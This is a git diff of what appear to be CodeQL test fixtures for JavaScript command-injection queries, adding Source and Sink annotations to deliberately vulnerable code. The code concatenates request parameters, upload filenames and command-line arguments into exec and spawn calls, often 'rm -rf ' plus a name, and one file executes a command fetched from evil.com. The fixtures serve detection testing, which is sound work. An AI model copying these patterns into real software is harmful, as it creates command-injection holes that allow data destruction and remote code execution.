b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh.js @@ -12,10 +12,10 @@ function getShell() { function execSh(command, options) { var shell = getShell() - return cp.spawn(shell.cmd, [shell.arg, command], options) // $ Alert + return cp.spawn(shell.cmd, [shell.arg, command], options) // $ Alert Sink } http.createServer(function (req, res) { - let cmd = url.parse(req.url, true).query.path; + let cmd = url.parse(req.url, true).query.path; // $ Source execSh(cmd); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh2.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh2.js index 9d12f22bb249..5b6d770a2653 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh2.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh2.js @@ -7,10 +7,10 @@ function getShell() { } function execSh(command, options) { - return cp.spawn(getShell(), ["-c", command], options) // $ Alert + return cp.spawn(getShell(), ["-c", command], options) // $ Alert Sink }; http.createServer(function (req, res) { - let cmd = url.parse(req.url, true).query.path; + let cmd = url.parse(req.url, true).query.path; // $ Source execSh(cmd); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/execSeries.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/execSeries.js index 1cfc40856113..45f3e25a8971 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/execSeries.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/execSeries.js @@ -15,6 +15,6 @@ function execEach(commands) { }; require('http').createServer(function(req, res) { - let cmd = require('url').parse(req.url, true).query.path; + let cmd = require('url').parse(req.url, true).query.path; // $ Source execEach([cmd]); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/form-parsers.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/form-parsers.js index 0efc3279cf50..22ca9745c101 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/form-parsers.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/form-parsers.js @@ -10,7 +10,7 @@ app.post('/profile', upload.single('avatar'), function (req, res, next) { }); app.post('/photos/upload', upload.array('photos', 12), function (req, res, next) { - req.files.forEach(file => { + req.files.forEach(file => { // $ Source exec("touch " + file.originalname); // $ Alert }) }); @@ -21,7 +21,7 @@ var Busboy = require('busboy'); http.createServer(function (req, res) { var busboy = new Busboy({ headers: req.headers }); - busboy.on('file', function (fieldname, file, filename, encoding, mimetype) { + busboy.on('file', function (fieldname, file, filename, encoding, mimetype) { // $ Source exec("touch " + filename); // $ Alert }); req.pipe(busboy); @@ -32,12 +32,12 @@ const formidable = require('formidable'); app.post('/api/upload', (req, res, next) => { let form = formidable({ multiples: true }); - form.parse(req, (err, fields, files) => { + form.parse(req, (err, fields, files) => { // $ Source exec("touch " + fields.name); // $ Alert }); let form2 = new formidable.IncomingForm(); - form2.parse(req, (err, fields, files) => { + form2.parse(req, (err, fields, files) => { // $ Source exec("touch " + fields.name); // $ Alert }); }); @@ -49,13 +49,13 @@ http.createServer(function (req, res) { // parse a file upload var form = new multiparty.Form(); - form.parse(req, function (err, fields, files) { + form.parse(req, function (err, fields, files) { // $ Source exec("touch " + fields.name); // $ Alert }); var form2 = new multiparty.Form(); - form2.on('part', function (part) { // / file / field + form2.on('part', function (part) { // $ Source - / file / field exec("touch " + part.filename); // $ Alert }); form2.parse(req); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/other.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/other.js index a606c9166175..d4d4b36b674f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/other.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/other.js @@ -2,7 +2,7 @@ var http = require("http"), url = require("url"); var server = http.createServer(function (req, res) { - let cmd = url.parse(req.url, true).query.path; + let cmd = url.parse(req.url, true).query.path; // $ Source require("cross-spawn").sync(cmd); // $ Alert require("execa").shell(cmd); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/third-party-command-injection.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/third-party-command-injection.js index 16d91a4f6599..deb426291d6a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/third-party-command-injection.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/third-party-command-injection.js @@ -2,7 +2,7 @@ let https = require("https"), cp = require("child_process"); https.get("https://evil.com/getCommand", res => - res.on("data", command => { + res.on("data", command => { // $ Source cp.execSync(command); // $ Alert }) ); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/actions.js b/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/actions.js index 74301997e38c..021715395217 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/actions.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/actions.js @@ -9,6 +9,6 @@ function test(e) { exec(e['GITHUB_ACTION']); } -test(process.env); +test(process.env); // $ Source exec(getInput('data')); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/command-line-parameter-command-injection.js b/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/command-line-parameter-command-injection.js index fd1e9cdd9f97..fe5142a0b3c8 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/command-line-parameter-command-injection.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/command-line-parameter-command-injection.js @@ -7,7 +7,7 @@ var cp = require("child_process"); cp.exec("cmd.sh " + process.argv[1]); cp.exec("cmd.sh " + process.argv[2]); // $ Alert - var args = process.argv.slice(2); + var args = process.argv.slice(2); // $ Source cp.execSync(args[0]); // $ Alert cp.execSync("cmd.sh " + args[0]); // $ Alert @@ -21,7 +21,7 @@ var cp = require("child_process"); }); (function() { - const args = process.argv.slice(2); + const args = process.argv.slice(2); // $ Source const script = path.join(packageDir, 'app', 'index.js'); cp.execSync(`node ${script} ${args[0]} --option"`); // $ Alert cp.execSync(`node ${script} ${args.join(' ')} --option"`); // $ Alert @@ -36,7 +36,7 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // $ Alert var args = require('yargs') // eslint-disable-line .command('serve [port]', 'start the server', (yargs) => { }) .option('verbose', { foo: "bar" }) - .argv + .argv // $ Source cp.exec("cmd.sh " + args); // $ Alert @@ -47,15 +47,15 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // $ Alert const { argv: { ...args - }, + }, // $ Source } = require('yargs') .usage('Usage: foo bar') .command(); cp.exec("cmd.sh " + args); // $ Alert - var tainted1 = require('yargs').argv; - var tainted2 = require('yargs').parse() + var tainted1 = require('yargs').argv; // $ Source + var tainted2 = require('yargs').parse() // $ Source const {taint1: {...taint1rest},taint2: {...taint2rest}} = { taint1: tainted1, @@ -65,15 +65,15 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // $ Alert cp.exec("cmd.sh " + taint1rest); // $ Alert - has flow from tainted1 cp.exec("cmd.sh " + taint2rest); // $ Alert - has flow from tianted2 - var {...taint3} = require('yargs').argv; + var {...taint3} = require('yargs').argv; // $ Source cp.exec("cmd.sh " + taint3); // $ Alert - var [...taint4] = require('yargs').argv; + var [...taint4] = require('yargs').argv; // $ Source cp.exec("cmd.sh " + taint4); // $ Alert }); (function () { - const argv = process.argv.slice(2); + const argv = process.argv.slice(2); // $ Source var minimist = require("minimist"); cp.exec("cmd.sh " + minimist(argv).foo); // $ Alert @@ -85,10 +85,10 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // $ Alert cp.exec("cmd.sh " + yargsParser(process.argv.slice(2)).foo); // $ Alert import args from 'args' - var flags = args.parse(process.argv); + var flags = args.parse(process.argv); // $ Source cp.exec("cmd.sh " + flags.foo); // $ Alert - var flags = require('arg')({...spec}); + var flags = require('arg')({...spec}); // $ Source cp.exec("cmd.sh " + flags.foo); // $ Alert }) @@ -104,14 +104,14 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // $ Alert (function () { const commandLineArgs = require('command-line-args'); - const options = commandLineArgs(optionDefinitions); + const options = commandLineArgs(optionDefinitions); // $ Source cp.exec("cmd.sh " + options.foo); // $ Alert }); (function () { const meow = require('meow'); - const cli = meow(`helpstring`, {flags: {...flags}}); + const cli = meow(`helpstring`, {flags: {...flags}}); // $ Source cp.exec("cmd.sh " + cli.input[0]); // $ Alert }); @@ -119,18 +119,18 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // $ Alert (function () { var dashdash = require('dashdash'); - var opts = dashdash.parse({options: options}); + var opts = dashdash.parse({options: options}); // $ Source cp.exec("cmd.sh " + opts.foo); // $ Alert var parser = dashdash.createParser({options: options}); - var opts = parser.parse(); + var opts = parser.parse(); // $ Source cp.exec("cmd.sh " + opts.foo); // $ Alert }); (function () { - const { program } = require('commander'); + const { program } = require('commander'); // $ Source program.version('0.0.1'); cp.exec("cmd.sh " + program.opts().pizzaType); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/second-order.js b/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/second-order.js index 16ace6a020f6..b49d6b2bd73b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/second-order.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/second-order.js @@ -3,14 +3,14 @@ const app = express(); const { execFile } = require("child_process"); app.get("/", (req, res) => { - const remote = req.query.remote; + const remote = req.query.remote; // $ Source execFile("git", ["ls-remote", remote]); // $ Alert execFile("git", ["fetch", remote]); // $ Alert indirect("git", ["ls-remote", remote]); // $ Alert - const myArgs = req.query.args; + const myArgs = req.query.args; // $ Source execFile("git", myArgs); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/isImported.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/isImported.js index 5b58e1afe4f2..b4f75df03ac4 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/isImported.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/isImported.js @@ -2,6 +2,6 @@ const cp = require("child_process"); -module.exports.thisMethodIsImported = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.thisMethodIsImported = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js index 77f49ad77017..85d0402a8ae8 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js @@ -1,44 +1,44 @@ var cp = require("child_process") -module.exports.blah = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.blah = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink cp.execFile(name, [name]); cp.execFile(name, name); }; -module.exports.foo = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.foo = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink } -module.exports.foo.bar = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.foo.bar = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink } function cla() { } -cla.prototype.method = function (name) { - cp.exec("rm -rf " + name); // $ Alert +cla.prototype.method = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink } module.exports.cla = new cla(); function cla2() { } -cla2.prototype.method = function (name) { - cp.exec("rm -rf " + name); // $ Alert +cla2.prototype.method = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink } module.exports.bla = new cla2(); module.exports.lib2 = require("./lib2.js") class Cla3 { - constructor(name) { - cp.exec("rm -rf " + name); // $ Alert + constructor(name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink } - static foo(name) { - cp.exec("rm -rf " + name); // $ Alert + static foo(name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink } - bar(name) { - cp.exec("rm -rf " + name); // $ Alert + bar(name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink cp.exec("rm -rf " + notASource); } @@ -46,41 +46,41 @@ class Cla3 { module.exports.cla3 = Cla3; -module.exports.mz = function (name) { - require("mz/child_process").exec("rm -rf " + name); // $ Alert +module.exports.mz = function (name) { // $ Source + require("mz/child_process").exec("rm -rf " + name); // $ Alert Sink } -module.exports.flow = function (name) { - var cmd1 = "rm -rf " + name; // $ Alert +module.exports.flow = function (name) { // $ Source + var cmd1 = "rm -rf " + name; // $ Alert Sink cp.exec(cmd1); - var cmd2 = "rm -rf " + name; // $ Alert + var cmd2 = "rm -rf " + name; // $ Alert Sink function myExec(cmd) { cp.exec(cmd); } myExec(cmd2); } -module.exports.stringConcat = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.stringConcat = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink cp.exec(name); - cp.exec("for foo in (" + name + ") do bla end"); // $ Alert + cp.exec("for foo in (" + name + ") do bla end"); // $ Alert Sink - cp.exec("cat /foO/BAR/" + name) // $ Alert + cp.exec("cat /foO/BAR/" + name) // $ Alert Sink - cp.exec("cat \"" + name + "\"") // $ Alert + cp.exec("cat \"" + name + "\"") // $ Alert Sink - cp.exec("cat '" + name + "'") // $ Alert + cp.exec("cat '" + name + "'") // $ Alert Sink - cp.exec("cat '/foo/bar" + name + "'") // $ Alert + cp.exec("cat '/foo/bar" + name + "'") // $ Alert Sink cp.exec(name + " some file") } -module.exports.arrays = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.arrays = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink var args1 = ["node"]; args1.push(name); // $ Alert @@ -94,7 +94,7 @@ module.exports.arrays = function (name) { } var util = require("util"); -module.exports.format = function (name) { +module.exports.format = function (name) { // $ Source cp.exec(util.format("rm -rf %s", name)); // $ Alert cp.exec(util.format("rm -rf '%s'", name)); // $ Alert @@ -108,8 +108,8 @@ module.exports.format = function (name) { cp.exec(require("printf")('rm -rf %s', name)); // $ Alert } -module.exports.valid = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.valid = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (!isValidName(name)) { return; @@ -117,8 +117,8 @@ module.exports.valid = function (name) { cp.exec("rm -rf " + name); } -module.exports.safe = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.safe = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (!isSafeName(name)) { return; @@ -127,8 +127,8 @@ module.exports.safe = function (name) { } class Cla4 { - wha(name) { - cp.exec("rm -rf " + name); // $ Alert + wha(name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink } static bla(name) { @@ -145,20 +145,20 @@ function Cla5(name) { } module.exports.cla5 = new Cla5(); -module.exports.indirect = function (name) { - let cmd = "rm -rf " + name; // $ Alert +module.exports.indirect = function (name) { // $ Source + let cmd = "rm -rf " + name; // $ Alert Sink let sh = "sh"; let args = ["-c", cmd]; cp.spawn(sh, args, cb); } -module.exports.indirect2 = function (name) { +module.exports.indirect2 = function (name) { // $ Source let cmd = name; let sh = "sh"; let args = ["-c", cmd]; cp.spawn(sh, args, cb); - let cmd2 = "rm -rf " + name; // $ Alert + let cmd2 = "rm -rf " + name; // $ Alert Sink var args2 = [cmd2]; cp.spawn( 'cmd.exe', @@ -167,65 +167,65 @@ module.exports.indirect2 = function (name) { ); } -module.exports.cmd = function (command, name) { +module.exports.cmd = function (command, name) { // $ Source cp.exec("fo | " + command); - cp.exec("fo | " + name); // $ Alert + cp.exec("fo | " + name); // $ Alert Sink } -module.exports.sanitizer = function (name) { +module.exports.sanitizer = function (name) { // $ Source var sanitized = "'" + name.replace(/'/g, "'\\''") + "'" cp.exec("rm -rf " + sanitized); - var broken = "'" + name.replace(/'/g, "'\''") + "'" // $ Alert - cp.exec("rm -rf " + broken); // $ Alert + var broken = "'" + name.replace(/'/g, "'\''") + "'" // $ Alert Sink + cp.exec("rm -rf " + broken); // $ Alert Sink } var path = require("path"); -module.exports.guard = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.guard = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (!path.exist(name)) { - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink return; } cp.exec("rm -rf " + name); } -module.exports.blacklistOfChars = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.blacklistOfChars = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (/[^A-Za-z0-9_\/:=-]/.test(name)) { - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink } else { cp.exec("rm -rf " + name); } } -module.exports.whitelistOfChars = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.whitelistOfChars = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (/^[A-Za-z0-9_\/:=-]$/.test(name)) { cp.exec("rm -rf " + name); } else { - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink } } -module.exports.blackList2 = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.blackList2 = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (!/^([a-zA-Z0-9]+))?$/.test(name)) { - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink process.exit(-1); } - cp.exec("rm -rf " + name); // $ SPURIOUS: Alert - FP due to tracking flow through `process.exit()`. + cp.exec("rm -rf " + name); // $ Sink SPURIOUS: Alert - FP due to tracking flow through `process.exit()`. } -module.exports.accessSync = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.accessSync = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink try { path.accessSync(name); @@ -233,7 +233,7 @@ module.exports.accessSync = function (name) { return; } - cp.exec("rm -rf " + name); // $ SPURIOUS: Alert - FP due to `path.accessSync` not being recognized as a sanitizer. + cp.exec("rm -rf " + name); // $ Sink SPURIOUS: Alert - FP due to `path.accessSync` not being recognized as a sanitizer. } var cleanInput = function (s) { @@ -245,27 +245,27 @@ var cleanInput = function (s) { return s; } -module.exports.goodSanitizer = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.goodSanitizer = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink var cleaned = cleanInput(name); - cp.exec("rm -rf " + cleaned); // $ SPURIOUS: Alert - SanitizingRegExpTest is not able to generate a barrier edge for an edge into a phi node. + cp.exec("rm -rf " + cleaned); // $ Sink SPURIOUS: Alert - SanitizingRegExpTest is not able to generate a barrier edge for an edge into a phi node. } var fs = require("fs"); -module.exports.guard2 = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.guard2 = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (!fs.existsSync("prefix/" + name)) { - cp.exec("rm -rf prefix/" + name); // $ Alert + cp.exec("rm -rf prefix/" + name); // $ Alert Sink return; } cp.exec("rm -rf prefix/" + name); } -module.exports.sanitizerProperty = function (obj) { - cp.exec("rm -rf " + obj.version); // $ Alert +module.exports.sanitizerProperty = function (obj) { // $ Source + cp.exec("rm -rf " + obj.version); // $ Alert Sink obj.version = ""; @@ -273,12 +273,12 @@ module.exports.sanitizerProperty = function (obj) { } module.exports.Foo = class Foo { - start(opts) { - cp.exec("rm -rf " + opts.bla); // $ Alert + start(opts) { // $ Source + cp.exec("rm -rf " + opts.bla); // $ Alert Sink this.opts = {}; this.opts.bla = opts.bla - cp.exec("rm -rf " + this.opts.bla); // $ Alert + cp.exec("rm -rf " + this.opts.bla); // $ Alert Sink } } @@ -304,25 +304,25 @@ function sanitizeShellString(str) { return result } -module.exports.sanitizer2 = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.sanitizer2 = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink var sanitized = sanitizeShellString(name); cp.exec("rm -rf " + sanitized); } -module.exports.typeofcheck = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.typeofcheck = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (typeof name === "undefined") { cp.exec("rm -rf " + name); } else { - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink } } -module.exports.typeofcheck = function (arg) { - var cmd = "MyWindowCommand | findstr /i /c:" + arg; // $ Alert +module.exports.typeofcheck = function (arg) { // $ Source + var cmd = "MyWindowCommand | findstr /i /c:" + arg; // $ Alert Sink cp.exec(cmd); } @@ -336,8 +336,8 @@ module.exports.unproblematic = function() { cp.exec("rm -rf " + id("test")); }; -module.exports.problematic = function(n) { - cp.exec("rm -rf " + id(n)); // $ Alert +module.exports.problematic = function(n) { // $ Source + cp.exec("rm -rf " + id(n)); // $ Alert Sink }; module.exports.typeofNumber = function(n) { @@ -346,9 +346,9 @@ module.exports.typeofNumber = function(n) { } }; -function boundProblem(safe, unsafe) { +function boundProblem(safe, unsafe) { // $ Source cp.exec("rm -rf " + safe); - cp.exec("rm -rf " + unsafe); // $ Alert + cp.exec("rm -rf " + unsafe); // $ Alert Sink } Object.defineProperty(module.exports, "boundProblem", { @@ -402,8 +402,8 @@ function yetAnohterSanitizer(str) { return result; } -module.exports.sanitizer3 = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.sanitizer3 = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink var sanitized = yetAnohterSanitizer(name); cp.exec("rm -rf " + sanitized); @@ -411,8 +411,8 @@ module.exports.sanitizer3 = function (name) { const cp = require("child_process"); const spawn = cp.spawn; -module.exports.shellOption = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.shellOption = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink cp.execFile("rm", ["-rf", name], {shell: true}, (err, out) => {}); // $ Alert cp.spawn("rm", ["-rf", name], {shell: true}); // $ Alert @@ -438,13 +438,13 @@ function build(first, last) { }; var asyncExec = require("async-execute"); -module.exports.asyncStuff = function (name) { - asyncExec("rm -rf " + name); // $ Alert +module.exports.asyncStuff = function (name) { // $ Source + asyncExec("rm -rf " + name); // $ Alert Sink } const myFuncs = { - myFunc: function (name) { - asyncExec("rm -rf " + name); // $ Alert + myFunc: function (name) { // $ Source + asyncExec("rm -rf " + name); // $ Alert Sink } }; @@ -474,13 +474,13 @@ const {promisify} = require('util'); const exec = promisify(require('child_process').exec); -module.exports.check = function check(config) { +module.exports.check = function check(config) { // $ Source const cmd = path.join(config.installedPath, 'myBinary -v'); // $ Alert return exec(cmd); } -module.exports.splitConcat = function (name) { - let args = ' my name is ' + name; // $ Alert +module.exports.splitConcat = function (name) { // $ Source + let args = ' my name is ' + name; // $ Alert Sink let cmd = 'echo'; cp.exec(cmd + args); } @@ -495,8 +495,8 @@ module.exports.myCommand = function (myCommand) { cp: require('child_process') }; - module.exports.myIndirectThing = function (name) { - MyThing.cp.exec("rm -rf " + name); // $ Alert + module.exports.myIndirectThing = function (name) { // $ Source + MyThing.cp.exec("rm -rf " + name); // $ Alert Sink } }); @@ -506,48 +506,48 @@ for (var name in imp){ module.exports[name] = imp[name]; } -module.exports.sanitizer4 = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.sanitizer4 = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (isNaN(name)) { - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink } else { cp.exec("rm -rf " + name); } if (isNaN(parseInt(name))) { - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink } else { cp.exec("rm -rf " + name); } if (isNaN(+name)) { - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink } else { cp.exec("rm -rf " + name); } if (isNaN(parseInt(name, 10))) { - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink } else { cp.exec("rm -rf " + name); } if (isNaN(name - 0)) { - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink } else { cp.exec("rm -rf " + name); } if (isNaN(name | 0)) { // <- not a sanitizer - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink } else { - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink } } -module.exports.shellThing = function (name) { +module.exports.shellThing = function (name) { // $ Source function indirectShell(cmd, args, spawnOpts) { cp.spawn(cmd, args, spawnOpts); // $ Alert } @@ -555,28 +555,28 @@ module.exports.shellThing = function (name) { indirectShell("rm", ["-rf", name], {shell: true}); // $ Alert } -module.exports.badSanitizer = function (name) { +module.exports.badSanitizer = function (name) { // $ Source if (!name.match(/^(.|\.){1,64}$/)) { // <- bad sanitizer - exec("rm -rf " + name); // $ Alert + exec("rm -rf " + name); // $ Alert Sink } else { - exec("rm -rf " + name); // $ Alert + exec("rm -rf " + name); // $ Alert Sink } if (!name.match(/^\w{1,64}$/)) { // <- good sanitizer - exec("rm -rf " + name); // $ Alert + exec("rm -rf " + name); // $ Alert Sink } else { exec("rm -rf " + name); } } -module.exports.safeWithBool = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.safeWithBool = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (isSafeName(name)) { cp.exec("rm -rf " + name); } - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink if (isSafeName(name) === true) { cp.exec("rm -rf " + name); @@ -587,10 +587,10 @@ module.exports.safeWithBool = function (name) { } if (isSafeName(name) == false) { - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink } - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink } function indirectThing(name) { @@ -605,8 +605,8 @@ function moreIndirect(name) { return indirectThing2(name) !== false; } -module.exports.veryIndeirect = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.veryIndeirect = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (indirectThing(name)) { cp.exec("rm -rf " + name); @@ -623,15 +623,15 @@ module.exports.veryIndeirect = function (name) { if (moreIndirect(name) !== false) { cp.exec("rm -rf " + name); } else { - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink } - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink } -module.exports.sanitizer = function (name) { - var sanitized = "'" + name.replace(new RegExp("\'"), "'\\''") + "'" // $ Alert - cp.exec("rm -rf " + sanitized); // $ Alert +module.exports.sanitizer = function (name) { // $ Source + var sanitized = "'" + name.replace(new RegExp("\'"), "'\\''") + "'" // $ Alert Sink + cp.exec("rm -rf " + sanitized); // $ Alert Sink var sanitized = "'" + name.replace(new RegExp("\'", 'g'), "'\\''") + "'" cp.exec("rm -rf " + sanitized); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib2.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib2.js index 6dc040fd7800..9c427622c770 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib2.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib2.js @@ -1,9 +1,9 @@ var cp = require("child_process") -module.exports = function (name) { - cp.exec("rm -rf " + name); // $ Alert - is imported from main module. +module.exports = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - is imported from main module. }; -module.exports.foo = function (name) { - cp.exec("rm -rf " + name); // $ Alert - is imported from main module. +module.exports.foo = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - is imported from main module. }; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/amdSub.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/amdSub.js index df2b9bd82e60..e268f47c4e20 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/amdSub.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/amdSub.js @@ -1,5 +1,5 @@ const cp = require("child_process"); -module.exports = function (name) { - cp.exec("rm -rf " + name); // $ Alert - this function is exported from `amd.js` +module.exports = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - this function is exported from `amd.js` }; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/index.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/index.js index ba4bd7089693..0b1abc951286 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/index.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/index.js @@ -1,15 +1,15 @@ var cp = require("child_process") -module.exports = function (name) { - cp.exec("rm -rf " + name); // $ Alert - 